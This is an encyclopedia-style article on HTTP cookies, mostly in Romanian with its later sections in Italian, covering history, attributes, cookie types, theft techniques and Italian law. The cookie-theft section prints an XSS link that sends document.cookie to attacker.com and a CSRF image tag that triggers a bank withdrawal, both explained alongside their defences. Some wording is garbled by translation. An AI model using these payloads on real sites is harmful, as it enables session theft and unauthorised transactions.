Cookie-uri

Exemplu de răspuns HTTP de la google.com care setează un cookie cu atribute.

Cookie-urile HTTP ( pron. / ˈKuki / ; mai precis numite cookie-uri web sau cookie-uri prin excelență) ^[1] sunt un anumit tip de cookie magic (un fel de simbol de identificare) și sunt utilizate de aplicațiile web de pe server pentru a stoca și a prelua informații pe termen lung din partea clientului .

Istorie

Conceptul și termenul cookie , care literalmente înseamnă „cookie”, derivă din cookie-ul magic ( cookie-ul magic ) o tehnică cunoscută în mediul UNIX încă din anii 1980 și utilizată în mod obișnuit pentru implementarea mecanismelor de identificare ale unui client la un server , precum ca exemplu X Window System autentificare server.

Prima utilizare a cookie-urilor HTTP datează din 1994, când au fost folosite pentru a verifica dacă cititorii site-ului Netscape l-au vizitat deja înainte. În 1995, gestionarea cookie-urilor a fost integrată în Internet Explorer 2. Introducerea cookie-urilor nu a fost inițial cunoscută de un public larg, dar a fost începută după un articol publicat în Financial Times pe 12 februarie 1996 ^[2] . Dezbaterea care a urmat a avut ca temă implicațiile cookie-urilor asupra secretului. Cookie-urile au făcut obiectul a două audieri ale Comisiei federale de comerț din SUA în 1996 și 1997. De la aceste date, utilizarea cookie-urilor a început să fie reglementată.

Astăzi, cele mai frecvente aplicații se referă la stocarea informațiilor despre obiceiurile utilizatorului pe site - urile pe care le vizitează. Aceste aplicații au ridicat deseori îndoieli din partea apărătorilor de confidențialitate a surferilor, de fapt un cookie ne-ar putea ajuta în navigare sau ne poate spiona. Acest al doilea caz include multe lanțuri publicitare (care vând reclame către mai multe site-uri diferite) care folosesc un cookie atașat la imaginea publicitară pentru a corela vizitele aceluiași utilizator la mai multe site-uri diferite, construind astfel un fel de profil al celor mai diverse site-uri. apreciat. Alte utilizări considerate convenabile deoarece utilizează cookie-ul ca serviciu pentru utilizator sunt, de exemplu, înregistrarea datelor unei sesiuni pentru a evita necesitatea unei noi autentificări într-o vizită ulterioară (la fel ca Wikipedia pentru utilizatorii săi înregistrați) sau păstrați conținutul „coșului de cumpărături” pe site-urile de comerț electronic .

Descriere

Generalitate

Serverele trimit cookie-uri în răspunsul HTTP către client și browserele web sunt de așteptat să salveze și să trimită cookie-uri către server ori de câte ori sunt făcute cereri suplimentare către serverul web .

Această recunoaștere permite crearea mecanismelor de autentificare utilizate de exemplu pentru conectări ; pentru a stoca date utile pentru sesiunea de navigare, cum ar fi preferințele privind aspectul grafic sau lingvistic al site - ului ; pentru a urmări navigarea utilizatorului, de exemplu în scopuri statistice sau publicitare; pentru a asocia datele stocate de server, de exemplu conținutul coșului de cumpărături al unui magazin electronic .

Având în vedere implicațiile pentru confidențialitatea navigatorilor web, utilizarea cookie-urilor este clasificată și reglementată în sistemele juridice din numeroase țări, inclusiv europene, inclusiv Italia. Securitatea unui cookie de autentificare depinde în general de securitatea site-ului care îl emite, de browserul web al utilizatorului și depinde dacă cookie - ul este criptat sau nu. Vulnerabilitățile de securitate pot permite hackerilor să citească datele cookie-urilor , care ar putea fi utilizate pentru a obține acces la datele utilizatorului sau pentru a avea acces (cu acreditări ale utilizatorului) la site-ul web al cărui cookie aparține (consultați scripturi între site-uri și falsificarea cererilor între site-uri) de exemplu). ^[3]

Cookie-urile și, în special, cookie - urile terților, sunt utilizate în mod obișnuit pentru a stoca căutările de navigare ale utilizatorilor; aceste date sensibile pot reprezenta o amenințare potențială pentru confidențialitatea utilizatorilor; tocmai acest lucru a determinat autoritățile europene ^[4] și americane să reglementeze utilizarea acesteia printr-o lege în 2011 ^[5] . De fapt, legislația europeană impune tuturor site-urilor statelor membre să informeze utilizatorii că site-ul folosește anumite tipuri de cookie-uri .

Caracteristici

În termeni practici și nespecializați, un cookie este similar cu un fișier mic, stocat pe computer de site-uri web în timpul navigării, util pentru salvarea preferințelor și îmbunătățirea performanței site-urilor web. Acest lucru optimizează experiența de navigare a utilizatorului.

În detaliu, un cookie este un șir de text mic trimis de un server web unui client web (de obicei un browser ) și apoi trimis înapoi de client către server (fără a fi modificat) de fiecare dată când clientul accesează aceeași porțiune. același domeniu web . Cookie-urile au fost inițial introduse pentru a oferi utilizatorilor o modalitate de a stoca articolele pe care doreau să le cumpere în timp ce navigau pe site (așa-numitul „coș de cumpărături”).

Astăzi, însă, conținutul coșului unui utilizator este stocat într-o bază de date de pe server, mai degrabă decât într-un cookie al clientului. Pentru a urmări utilizatorului căruia i se atribuie coșul de cumpărături, serverul web trimite un cookie către client care conține un identificator unic de sesiune (de obicei, o serie lungă de litere și numere). Deoarece cookie-urile sunt trimise la server la fiecare cerere a clientului, identificatorul sesiunii va fi trimis la server de fiecare dată când utilizatorul vizitează o pagină de pe site, acest lucru îi permite serverului să știe ce coș să-i furnizeze utilizatorului.

Deoarece cookie-urile de sesiune conțin doar un identificator unic de sesiune, acest lucru face ca cantitatea de informații personale pe care un site web să le poată stoca practic nelimitat. Site-ul nu se limitează la restricții privind durata de timp a șirului de text care alcătuiește un cookie. Cookie-urile de sesiune pot ajuta, de asemenea, la îmbunătățirea timpilor de încărcare a paginii, deoarece cantitatea de informații dintr-un cookie de sesiune este mică și necesită o lățime de bandă mică.

Cookie-ul principal, cel utilizat pentru stocarea opțiunilor pentru toate celelalte cookie-uri, se numește cookie tehnic (consimțământ) sau cel care prezidează trimiterea și primirea pachetului de informații (markeri).

Fiecare domeniu sau porțiune a acestuia care este vizitată cu browserul poate seta cookie-uri. Deoarece o pagină de internet tipică, cum ar fi cea a unui ziar din rețea, conține obiecte care provin din mai multe domenii diferite și fiecare dintre ele poate seta cookie-uri, este normal să găzduiți multe sute de cookie-uri în browserul dvs.

Cookie-urile sunt adesea considerate greșit a fi programe reale și acest lucru generează credințe eronate. În realitate, acestea sunt blocuri simple de date, incapabile, de la sine, de a efectua vreo acțiune pe computer . În special, nu pot fi spyware sau viruși . Cu toate acestea, cookie-urile de pe unele site-uri sunt clasificate ca spyware de multe produse anti-spyware, deoarece fac posibilă identificarea utilizatorului. Browserele moderne permit utilizatorilor să decidă dacă acceptă sau nu cookie-urile, dar orice refuz face unele obiecte inutilizabile. De exemplu, coșurile de cumpărături implementate cu cookie-uri nu funcționează în caz de refuz.

Cookie-urile nu sunt utilizate numai pe PC-uri sau similare, ci și pe smartphone-uri și tablete .

Operațiune

Un cookie este un antet suplimentar prezent într-o cerere HTTP ( Cookie :) sau răspuns ( Set-cookie :) : dacă serverul dorește să atribuie utilizatorului un cookie, acesta îl va adăuga la antetele de răspuns. Clientul trebuie să observe prezența cookie-ului și să-l stocheze într-o anumită zonă (în general, este utilizat un director în care fiecare cookie este stocat într-un fișier ). Cookie-ul constă dintr-un șir de text arbitrar, o dată de expirare (dincolo de care nu trebuie considerată validă) și un model pentru a recunoaște domeniile către care urmează să fie trimis înapoi. Pot fi setate mai multe cookie-uri într-un singur răspuns HTTP.

Browserul web client va returna cookie-ul, fără nicio modificare, atașându-l la toate cererile HTTP care îndeplinesc tiparul, în termenul de expirare. Serverul poate alege apoi să atribuie din nou cookie-ul, suprascriindu-l pe cel vechi. Retrimiterea tiparului permite tuturor subdomeniilor unui anumit domeniu să primească cookie-ul, dacă se dorește.

Cookie-urile sunt folosite pentru a adăuga o stare unui protocol apatrid. Fără cookie-uri nu ar exista nicio diferență într-o pagină încărcată înainte de conectare , de la aceeași pagină încărcată ulterior. Deoarece cookie-urile rămân în sistem pentru perioade lungi de timp, site-urile pot atribui un index utilizatorului și pot urmări navigarea lor în cadrul site-ului, de obicei în scopul creării de statistici. Ele pot fi, de asemenea, utilizate pentru a urmări navigarea pe site-uri terțe, în cazul în care aceste site-uri terțe utilizează conținut de pe site-ul care a setat cookie-ul. Publicitatea pe site-uri este de obicei gestionată de companii care au reclame pe diferite site-uri web.

Conținutul reclamei în sine este încărcat direct de pe serverul lor (printr-o cerere HTTP) și afișat într-o manieră integrată pe site-ul pe care utilizatorul dorește să îl viziteze. În acest fel, serverul companiei de publicitate va primi adresa paginii vizualizate din browserul utilizatorului și va putea trimite un cookie clientului. Prin acest mecanism, companiile de publicitate pot agrega informații despre utilizatori și pot crea profiluri și le pot afișa reclame direcționate.

Utilizare

Deoarece pot fi utilizate pentru a monitoriza navigarea pe Internet , cookie-urile fac obiectul unor discuții cu privire la dreptul la confidențialitate . Multe țări și organizații, inclusiv Statele Unite și Uniunea Europeană , au legiferat în acest sens. Cookie-urile au fost, de asemenea, criticate, deoarece nu sunt întotdeauna capabile să identifice utilizatorul cu precizie și, de asemenea, deoarece pot fi supuse atacurilor cibernetice . Există câteva alternative la cookie-uri, dar toate, împreună cu unele avantaje, au contraindicații.

În politica privind cookie-urile , administratorii unui site web trebuie să specifice în detaliu politica propriilor cookie-uri sau a terților.

Activitățile pentru care sunt utilizate sunt autentificarea , urmărirea sesiunii și stocarea informațiilor specifice privind utilizatorii care accesează serverul , precum site-urile web preferate sau, în cazul achizițiilor online, conținutul „coșurilor de cumpărături” ale acestora.

Chiar și cel mai faimos motor de căutare din lume, Google , trimite un cookie care stochează date privind căutările, cuvintele cheie de căutare și obiceiurile utilizatorilor.

Mai precis, diferitele utilizări ale cookie-urilor sunt, prin urmare:

Pentru a umple coșul de cumpărături virtual pe site-urile comerciale (cookie-urile ne permit să plasăm sau să scoatem articole din coș în orice moment).
Pentru a permite unui utilizator să se conecteze la un site web.
Pentru a personaliza pagina web în funcție de preferințele utilizatorului (de exemplu, motorul de căutare Google îi permite utilizatorului să decidă câte rezultate de căutare dorește să afișeze pe pagină).
Pentru a urmări căile utilizatorului (utilizate în mod obișnuit de companiile de publicitate pentru a obține informații despre navigator, gusturile și preferințele acestuia. Aceste date sunt utilizate pentru a urmări profilul unui vizitator pentru a prezenta doar bannere publicitare care l-ar putea interesa).
Pentru gestionarea unui site: cookie-urile sunt utilizate de cei responsabili de actualizarea unui site pentru a înțelege modul în care vizitează utilizatorii, ce cale urmează în cadrul site-ului. Dacă calea duce la alei orbe, managerul poate observa și poate îmbunătăți navigarea pe site.
Pentru a partaja informații despre rețelele sociale cu alți utilizatori.

Multe browsere moderne permit utilizatorului să decidă când să accepte cookie-urile, dar respingerea unor cookie-uri nu permite utilizarea unor site-uri (să luăm ca exemplu înregistrarea pe un site web precum Wikipedia).

Setările pot fi personalizate pentru a le activa sau a le bloca întotdeauna, într-o anumită perioadă de ședere, pentru a filtra site-urile pe baza listelor albe și a listelor negre și pentru a filtra cookie-urile utilizate de același server sau, de asemenea, de linkuri (adesea publicitate) către site-uri găzduite pe diferite servere.

Trebuie remarcat faptul că funcționarea cookie-urilor depinde în totalitate de browserul de navigare pe care îl folosește utilizatorul: în teorie, acest program poate oferi utilizatorului control complet asupra cookie-urilor și permite sau refuză crearea și diseminarea acestora.Microsoft Internet Explorer are doar o gestionare rudimentară a cookie-urilor, în timp ce alternative precum Opera sau Mozilla Firefox oferă utilizatorului un control mai mare și vă permit să acceptați / respingeți cookie-urile de pe anumite site-uri. Alte programe, care trebuie utilizate ca proxy , permit utilizatorului un grad mai mare de control asupra a ceea ce se întâmplă.

Un server Tor sau proxy are ca efect suprem, nu ștergerea adresei IP, ci o face să pară diferită de cea a computerului dumneavoastră. În cazul detectării adresei IP, cu aceste măsuri, nu există nicio limitare a numărului de site-uri navigabile.

Structura

Elemente

Contrar credinței populare, un cookie nu este un fișier text mic: poate fi stocat într-un fișier text, dar nu neapărat. În modul cookie putem găsi de obicei patru atribute:

Nume / valoare este o variabilă și un câmp obligatoriu.
Data de expirare este un atribut opțional care vă permite să stabiliți data de expirare a cookie-ului. Poate fi exprimat ca o dată, ca număr maxim de zile sau ca Acum (implică faptul că cookie-ul este șters imediat de pe computerul utilizatorului, deoarece expiră când este creat) sau Niciodată (niciodată) (implică faptul că cookie-ul nu este expiră și acestea se numesc persistente).
Modul de acces (HttpOnly) face cookie-ul invizibil pentru JavaScript și alte limbi din partea clientului de pe pagină.
Secure indică dacă cookie-ul trebuie trimis criptat cu HTTPS .

Domeniu și cale

Domeniul (domeniul) și calea (calea) definesc domeniul de vizibilitate al cookie-ului, indică browserului că cookie-ul poate fi trimis la server numai pentru domeniul și calea specificate. Dacă nu este specificat, implicit, acestea iau valoarea domeniului și calea care le-a solicitat inițial. Un exemplu de directivă pentru crearea de cookie-uri de către un site web după logarea unui utilizator este următorul:

Set-Cookie: LSID=DQAAAK…Eaem_vYg; Domain=docs.foo.com; Path=/accounts; Expires=Wed, 13-Jan-20021 22:23:01 GMT; Secure; HttpOnly Set-Cookie: HSID=AYQEVn….DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-20021 22:23:01 GMT; HttpOnly Set-Cookie: SSID=Ap4P….GTEq; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-20021 22:23:01 GMT; Secure; HttpOnly ......

Primul cookie LSID are ca domeniu implicit docs.foo.com și cale /accounts , care vor docs.foo.com browserul să utilizeze cookie-ul numai atunci când pagina solicitată conține docs.foo.com/accounts . Celelalte 2 cookie-uri HSID și SSID pot fi trimise de la browser la server atunci când sunt vizitate, oricare dintre subdomeniile din .foo.com cu orice cale, de exemplu www.foo.com/ . Cookie-urile pot fi setate numai de principalele domenii și subdomeniile acestora.

Tipuri de cookie-uri

Varietatea largă de cookie-uri din lumea web face dificilă clasificarea acestora. Cu toate acestea, este posibil să se întocmească o taxonomie generală, separându-le în diferite categorii. ^[6] Principalul atribut prin care putem împărți cookie-urile este ciclul lor de viață , care ne permite să le distingem în:

Cookie-uri de sesiune: aceste cookie-uri nu sunt stocate permanent pe dispozitivul utilizatorului și sunt șterse când browserul este închis ^[7] . Spre deosebire de alte cookie-uri, cookie-urile de sesiune nu au o dată de expirare, iar pe această bază browserul este capabil să le identifice ca atare.
Cookie-uri persistente: în loc să dispară când browserul este închis, la fel ca în cazul cookie-urilor de sesiune, cookie-urile persistente expiră la o anumită dată sau după o anumită perioadă de timp. Aceasta înseamnă că, pentru întreaga durată de viață a cookie-ului (care poate fi lungă sau scurtă în funcție de data de expirare stabilită de creatorii săi), informațiile sale vor fi transmise serverului de fiecare dată când utilizatorul vizită site-ul web sau ori de câte ori utilizatorul vizualizează o resursă aparținând acelui site de pe alt site (de exemplu o reclamă). Din acest motiv, cookie-urile persistente pot fi utilizate de agenții de publicitate pentru a înregistra informații despre obiceiurile de navigare pe web ale unui utilizator pentru o perioadă lungă de timp. Cu toate acestea, acestea sunt utilizate și din motive „legitime” (cum ar fi păstrarea utilizatorilor înregistrați în contul lor pe site-uri web, pentru a evita introducerea acreditării pentru a accesa site-urile web la fiecare vizită).

Apoi este posibil să clasificați cookie-urile în funcție de originea lor în:

Cookie-uri primare: în mod normal, atributul de domeniu al unui cookie va corespunde domeniului afișat în bara de adrese a browserului web; sunt cookie-uri trimise către browser direct de pe site-ul pe care îl vizitați. Aceasta se numește cookie de primă parte . Ele pot fi atât persistente, cât și de sesiune; acestea sunt gestionate direct de proprietarul și / sau managerul site-ului și sunt utilizate, de exemplu, pentru a garanta funcționarea sa tehnică sau pentru a ține evidența preferințelor exprimate cu privire la utilizarea site-ului.
Cookie - uri terță parte : cookie - urile terță parte aparțin altor domenii decât cel afișat în bara de adrese. Aceste tipuri de cookie-uri apar de obicei atunci când paginile web prezintă conținut, cum ar fi anunțuri banner, de pe site-uri web externe. Acest lucru implică posibilitatea de a monitoriza istoricul de navigare al utilizatorului și este adesea utilizat de agenții de publicitate, în încercarea de a difuza reclame relevante și personalizate pentru fiecare utilizator. De exemplu, să presupunem că un utilizator vizitează www.example.org . Acest site web conține o reclamă de la ad.foxytracking.com , care, odată descărcată, setează un cookie aparținând domeniului publicitar ( ad.foxytracking.com ). Apoi, utilizatorul vizitează un alt site web, www.foo.com , care conține și un anunț de la ad.foxytracking.com/ și care stabilește și un cookie aparținând domeniului respectiv ( ad.foxytracking.com ). În cele din urmă, ambele cookie-uri vor fi trimise vânzătorului atunci când își încarcă reclamele sau vizitează site-ul web. Agentul de publicitate poate utiliza apoi aceste cookie-uri pentru a construi un istoric de navigare a utilizatorilor pe toate site-urile care au anunțuri de la acest agent de publicitate. Majoritatea browserelor web moderne conțin setări de confidențialitate care pot bloca cookie-urile terților.

În cele din urmă, este posibil să le deosebim de punctul de vedere al utilizării (sau al scopului ) în:

Cookie-uri tehnice: sunt utilizate pentru navigare (deoarece sunt funcționale necesare pentru derularea paginii, consultarea conținutului, furnizarea serviciului) și pentru a facilita accesul și utilizarea site-ului de către utilizator. Cookie-urile tehnice sunt esențiale, de exemplu, pentru a accesa Google sau Facebook fără a fi nevoie să vă conectați la toate sesiunile. Acestea sunt, de asemenea, atât în operațiuni foarte delicate, cum ar fi cele de home banking sau plata prin card de credit sau prin intermediul altor sisteme.
Cookie-uri statistice: sunt utilizate în scopul optimizării site-ului, direct de către proprietarul site-ului, care poate colecta informații în formă agregată cu privire la numărul de utilizatori și modul în care aceștia vizitează site-ul. În aceste condiții, aceleași reguli se aplică cookie-urilor statistice, în ceea ce privește informațiile și consimțământul, prevăzute pentru cookie-urile tehnice.
Cookie-uri pentru stocarea preferințelor: (numite și cookie-uri funcționale ) sunt cookie-uri utile pentru a favoriza utilizarea eficientă a site-ului de către utilizator și, astfel, pentru a favoriza experiența de navigare personalizată. Acestea sunt utilizate, de exemplu, pentru a urmări limba aleasă.
Cookie-uri de marketing și profilare (publicitate): aceste cookie-uri sunt destinate să ofere spații publicitare. Acestea pot fi instalate de către proprietarul site-ului sau de către terți. Unele sunt utilizate pentru a recunoaște reclame individuale și pentru a ști care au fost selectate și când. Alte cookie-uri publicitare sunt folosite pentru a ipotezia „profilului” de navigare al unui utilizator, pentru a putea propune mesaje publicitare în conformitate cu comportamentul și interesele sale din rețea. Acest „profil” este anonim și informațiile colectate prin intermediul acestor cookie-uri nu permit urmărirea identității utilizatorului. În acest caz, cookie-ul prezidează unul dintre sistemele de pilotare a așa-numitei „publicități comportamentale” ^[8] .
Cookie-uri de rețea socială: acestea sunt cookie-uri care vă permit să partajați conținutul site-ului pe care îl vizitați cu alți utilizatori. Aceste cookie-uri sunt de obicei utilizate pentru a activa funcțiile „Apreciază” sau „Urmăriți” ale rețelelor sociale precum Facebook și Twitter, doar pentru a numi câteva. Aceste funcții permit rețelelor sociale să își identifice utilizatorii și să colecteze informații chiar și atunci când navighează pe alte site-uri.

Alte tipuri utile de cookie-uri:

Cookie securizat: Un cookie cu semnalizatorul Secure poate fi transmis numai printr-o conexiune criptată (adică HTTPS ). Acest lucru scade probabilitatea de a fi expus la furtul de cookie-uri prin interceptare. Pentru a realiza acest lucru, browserele care acceptă acest semnal vor trimite cookie-uri cu semnalizare Secure atunci când este solicitată o pagină HTTPS. Cu alte cuvinte, browserul nu va trimite un cookie cu steagul Secure pe o cerere HTTP, adică pe o conexiune necriptată.
Cookie HttpOnly: cookie-urile cu steagul HttpOnly pot fi utilizate numai dacă sunt transmise prin HTTP (sau HTTPS ). Nu sunt accesibile prin API-uri non-HTTP, cum ar fi JavaScript. Această restricție elimină amenințarea furtului de cookie-uri prin intermediul scripturilor cross-site (XSS), evitând amenințările de urmărire cross-site (XST) și falsificarea cererilor cross-site (CSRF) .
Cookie SameSite: Google Chrome 51 a introdus ^[9] un nou flag SameSite care permite trimiterea cookie-ului numai pentru cereri din aceeași sursă, reușind astfel să neutralizeze atacuri precum CSRF și alte tipuri de atacuri.
SuperCookie: „Supercookie” este un cookie cu o origine a domeniului de nivel superior (de exemplu .com ) sau un sufix public (de exemplu .co.uk ). Pe de altă parte, cookie-urile obișnuite provin dintr-un anumit domeniu, de exemplu example.com . Supercookies-urile pot fi o potențială problemă de securitate și, prin urmare, sunt adesea blocate de browserele web. Dacă este deblocat de pe computerul clientului, un atacator, printr-un site web rău intenționat, ar putea configura un supercookie și ar putea distruge sau redirecționa cererile utilizatorilor legitimi către un alt site web care are același domeniu de nivel superior sau sufix public ca și site-ul web. De exemplu, un supercookie cu un domeniu .com ar putea influența cu rea intenție o cerere avansată către example.com , chiar dacă cookie-ul nu provine de la example.com . Aceasta poate fi utilizată pentru falsificarea autentificării sau modificarea informațiilor despre utilizator. Lista Sufixelor Publice ^[10] ajută la reducerea riscului care poate fi creat prin supercookies. Această listă este o inițiativă transversală care își propune să ofere o listă exactă și actualizată a numelor de domenii. Versiunile mai vechi ale browserelor nu pot avea o listă actualizată și, prin urmare, vor fi vulnerabile la supercookies din anumite domenii.
Cookie-uri pentru zombi: cookie-urile pentru zombi sunt cookie-uri care sunt recreate automat după ce au fost șterse. Acest lucru se realizează prin stocarea conținutului cookie în locații multiple, cum ar fi stocarea locală flash, stocarea HTML5 și prin alte mecanisme de arhivare atât de către client, cât și de către server. Când se detectează absența cookie-ului, acesta este recreat cu ajutorul datelor stocate în aceste locații. Un exemplu de cookie zombie este dat de biblioteca Evercookie .

Manipulări asupra cookie-urilor

O procedură de manipulare a cookie-urilor este otrăvirea cookie-urilor . Acesta constă în modificarea conținutului unui cookie (de exemplu, informațiile personale salvate pe computerul utilizatorului) pentru a eluda mecanismele de securitate . Prin această tehnică, atacatorii pot obține informații private și neautorizate de la un utilizator, precum și le pot fura identitatea digitală . Cookie-urile stocate pe computerul utilizatorului conțin informații care permit aplicațiilor să autentifice ID-ul utilizatorului, să monitorizeze comportamentul utilizatorului și să personalizeze conținutul unui site. În general, aceste date sunt supuse criptării , dar algoritmii nu sunt întotdeauna siguri, astfel încât unii utilizatori cu intenții rău intenționate ar putea să ne fure datele și să le folosească sau să le modifice. Potrivit organizației Open Web Application Security Project, cunoscut în mod obișnuit sub numele de OWASP , manipularea cookie-urilor este unul dintre cele 20 de atacuri cele mai utilizate de hackeri, în special în sistemele de comerț electronic , și este utilizat pentru a identifica utilizatorul.

Majoritatea site-urilor web utilizează cookie-uri ca identificatori unici pentru sesiunile utilizatorilor, deoarece alte metode de identificare au limitări și vulnerabilități. Cu toate acestea, există riscul, de fapt, ar putea permite atacatorilor să fure și să suplinească cererile utilizatorilor. Din punctul de vedere al serverului web, o cerere făcută de un utilizator cu intenție rău intenționată (adică un utilizator care a furat cookie-urile altor utilizatori) nu are nicio diferență față de solicitarea făcută de către victimă.

Aici sunt enumerate mai multe tehnici de furt de cookie-uri care funcționează numai cu site-uri web care se bazează pe cookie-uri HTTP pentru autentificarea utilizatorilor.

Interceptări de rețea

Un cookie poate fi furat de pe alt computer prin interceptarea acestuia din rețea.

Traficul unei rețele poate fi interceptat și citit de un computer conectat la o altă rețea decât cea a expeditorului și destinatarului (în special atunci când este conectat la o rețea Wi-Fi necriptată). Acest trafic include cookie-uri trimise prin sesiuni HTTP necriptate și poate permite atacatorilor să citească comunicații de la alți utilizatori ai rețelei, inclusiv cookie-uri HTTP , precum și întregul conținut al conversațiilor, în scopul unui atac de tip „ man-in-the- attack”.

Un atacator ar putea folosi cookie-uri interceptate pentru a identifica utilizatorul care deține cookie-urile și pentru a efectua operațiuni rău intenționate, cum ar fi transferul de sume de bani din contul bancar al victimei în alte conturi, adesea de neratat.

Această problemă poate fi rezolvată printr-o comunicare criptată, între computerul utilizatorului și serverul web, folosind Transport Layer Security (protocol HTTPS ). Serverul poate specifica steagul Secure atunci când setează cookie-uri, astfel încât browserul să poată trimite cookie-uri numai pe un canal criptat, cum ar fi o conexiune SSL .

Subdomenii false și otrăvire cache DNS

Dacă un atacator este capabil să ascundă un server DNS și să facă utilizatorul să utilizeze un server DNS fals ( otrăvire cache DNS ), atunci acest lucru ar putea permite atacatorului să aibă acces la cookie-urile utilizatorului. De exemplu, un atacator ar putea utiliza otrăvirea cache-ului DNS pentru a crea un DNS fals al f12345.www.example.com care indică de fapt adresa IP a serverului atacatorului . Acesta din urmă poate introduce apoi imaginea URL a serverului lor (de exemplu, http://f12345.www.example.com/img_4_cookie.jpg) . Victimele care citesc mesajul atacatorului vor descărca această imagine de pe f12345.www.example.com . Deoarece f12345.www.example.com este un subdomeniu al www.example.com , browserul victimei va trimite toate cookie-urile example.com către serverul atacatorului.

Se un utente malintenzionato è in grado di raggiungere questo obiettivo, di solito la colpa è dei fornitori dei servizi Internet ( Internet Service Providers ) che non hanno garantito una connessione sicura dei server DNS. Tuttavia, la gravità di questo attacco può essere ridotta se il sito destinatario utilizza i cookie protetti. In questo caso, l'utente malintenzionato avrà un ulteriore ostacolo, quello di ottenere il certificato SSL del sito Web di destinazione da un' autorità di certificazione , dal momento che i cookie sicuri possono essere trasmessi solo tramite una connessione criptata. Senza un certificato SSL, i browser delle vittime avrebbero visualizzato un messaggio di avviso relativo al certificato non valido del sito web dell'attaccante, che potrebbe aiutare gli utenti a non visitarlo, evitando così di inviare i cookie ad un sito non sicuro.

Cross-site scripting: furto dei cookie

Lo stesso argomento in dettaglio: Cross-site scripting .

I cookie possono anche essere rubati utilizzando una tecnica chiamata cross-site scripting . Ciò si verifica quando un attaccante sfrutta un sito web che permette agli utenti di inviare contenuto non filtrato HTML e JavaScript. Inviando dei contenuti malevoli HTML e JavaScript, l'attaccante può servirsi del browser della vittima per prendere il controllo dei suoi cookie.

A titolo di esempio, un utente malintenzionato può inviare un messaggio sul www.example.com con il seguente link:

 < a href = "#" onclick = "window.location='http://attacker.com/stole.cgi?text='+escape(document.cookie); return false;" > Click here! </ a >

cross-site scripting: un cookie che dovrebbe essere scambiato solo tra server e client viene invece inviato all'attaccante.

Quando un altro utente clicca su questo link, il browser esegue un pezzo di codice all'interno dell'attributo onclick , sostituendo così la stringa document.cookie con la lista dei cookie che sono accessibili dalla pagina corrente. Come risultato, questo elenco di cookie viene inviato al server attacker.com . Se la connessione avviene mediante HTTPS https://www.example.com , i Secure cookie saranno inviati lo stesso ad attacker.com in formato testo.

È responsabilità degli sviluppatori dei siti web filtrare tale codice dannoso.

Tali attacchi possono essere ridotti utilizzando i cookie HttpOnly . Questi cookie non saranno accessibili dal lato client attraverso linguaggi di scripting come JavaScript e, quindi, l'attaccante non sarà in grado di rubare questi cookie.

Cross-site scripting: richiesta proxy

Nelle versioni più vecchie di molti browser, ci furono buchi di sicurezza che permisero agli attaccanti di sporcare gli script di una richiesta proxy, dal lato client, tramite XMLHttpRequest API. Ad esempio, la vittima sta leggendo un post di un attaccante su www.example.com , e lo script dell'attaccante viene eseguito nel browser della vittima. Lo script genera una richiesta per www.example.com con attacker.com come server proxy. Dal momento che la richiesta è per www.example.com , tutti i cookie di example.com verranno inviati insieme alla richiesta, tuttavia verranno instradati attraverso il server proxy dell'attaccante. Quindi, l'attaccante sarebbe in grado di intercettare i cookie della vittima.

Questo attacco non avrebbe funzionato con i Secure cookie, in quanto possono essere trasmessi solo su connessioni HTTPS , e il protocollo HTTPS implementa una crittografia end-to-end (vale a dire che le informazioni sono crittografate sul browser dell'utente e decifrate sul server di destinazione). In questo caso, il server proxy avrebbe visto solo i primi byte cifrati della richiesta HTTP.

Cross-site request forgery

Lo stesso argomento in dettaglio: Cross-site request forgery .

Ad esempio, Bob potrebbe navigare in un forum in cui un altro utente, Mallory, ha postato un messaggio. Supponiamo che Mallory abbia realizzato un'immagine HTML che fa riferimento ad un'operazione sul sito web della banca di Bob, (piuttosto che un file immagine) ad esempio:

 <img src= "http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory" >

Se la banca di Bob mantiene le sue informazioni di autenticazione in un cookie, e se il cookie non è scaduto, allora il tentativo da parte del browser di Bob di caricare l'immagine presenterà il modulo di rinuncia del suo cookie, autorizzando in tal modo una transazione senza l'approvazione di Bob.

Eliminazione

Una volta che si è impostato il browser perché accetti i cookie, essi sono archiviati in una speciale cartella del sistema, solitamente nel percorso dell'utente. Il percorso ove materialmente sono memorizzati i file corrispondenti dipende dalla combinazione tipologia dispositivo/sistema operativo/browser ^[11] . Si possono facilmente cancellare sia agendo sui comandi previsti dal browser (i medesimi che permettono di cancellare la cronologia, la cache , le informazioni di login , i dati di compilazione dei moduli, ecc.) oppure utilizzando uno dei tanti "pulitori" di terze parti, quali ad esempio CCleaner , Spybot- Search & Destroy . Oltre alla eliminazione massiva si può ricorrere a quella dei singoli file ma allora occorre riconoscerli agendo (nella cartella relativa) sugli specifici cookie di interesse.

Una volta eseguita l'eliminazione dei cookie, è normale che il browser ei vari siti web si ripresentino con delle richieste, rispettivamente, di personalizzazione impostazione e di accettazione cookie oppure la navigazione su siti abituali sia leggermente e inizialmente un poco più lenta: questo è dovuto, appunto, alla pulizia eseguita.

Aspetti giuridici

Legislazione italiana

In Italia la norma di riferimento relativamente ai cookie è l'art. 122 ^[12] del codice della privacy che nella sua formulazione a fine maggio 2012 recepisce la direttiva comunitaria 2009/136/CE ^[13] E-Privacy. È quindi necessario che l'utente, salvo casi particolari, sia informato e presti esplicitamente il consenso, prima che i cookie vengano salvati. Tale indicazione, pur se tesa a dare maggiori garanzie agli utenti, creò a suo tempo allerta negli operatori per il rischio che potesse compromettere le modalità di navigazione come le conosciamo oggi ^[14] .

Il 2 giugno 2015 divenne obbligatorio per i gestori di siti web adeguarsi al Provvedimento “Individuazione delle modalità semplificate per l'informativa e l'acquisizione del consenso per l'uso dei cookie” (Gazzetta Ufficiale n. 126 del 3 giugno 2014) dell'8 maggio 2014 ^[15] , con cui il Garante per la Protezione dei Dati Personali detta le regole sulle modalità di adempimento agli obblighi di rilascio dell'informativa e di acquisizione del consenso degli utenti in caso di utilizzo di cookie. Per tutti i siti web che utilizzano Cookie non tecnici (di profilazione) il Provvedimento stabilisce che nel momento in cui si accede ad una qualsiasi pagina del sito web deve immediatamente comparire in primo piano un banner ^[16] (contenente l'informativa breve) di idonee dimensioni, con caratteristiche tali da determinare una discontinuità dell'esperienza di navigazione, indicante:

a) L'utilizzo di Cookie di profilazione al fine di inviare messaggi pubblicitari in linea con le preferenze manifestate dall'utente nell'ambito della navigazione in rete;

b) se il sito consente l'invio di Cookie "terze parti";

c) il link all'informativa estesa;

d) la possibilità di negare il consenso all'installazione di qualunque cookie;

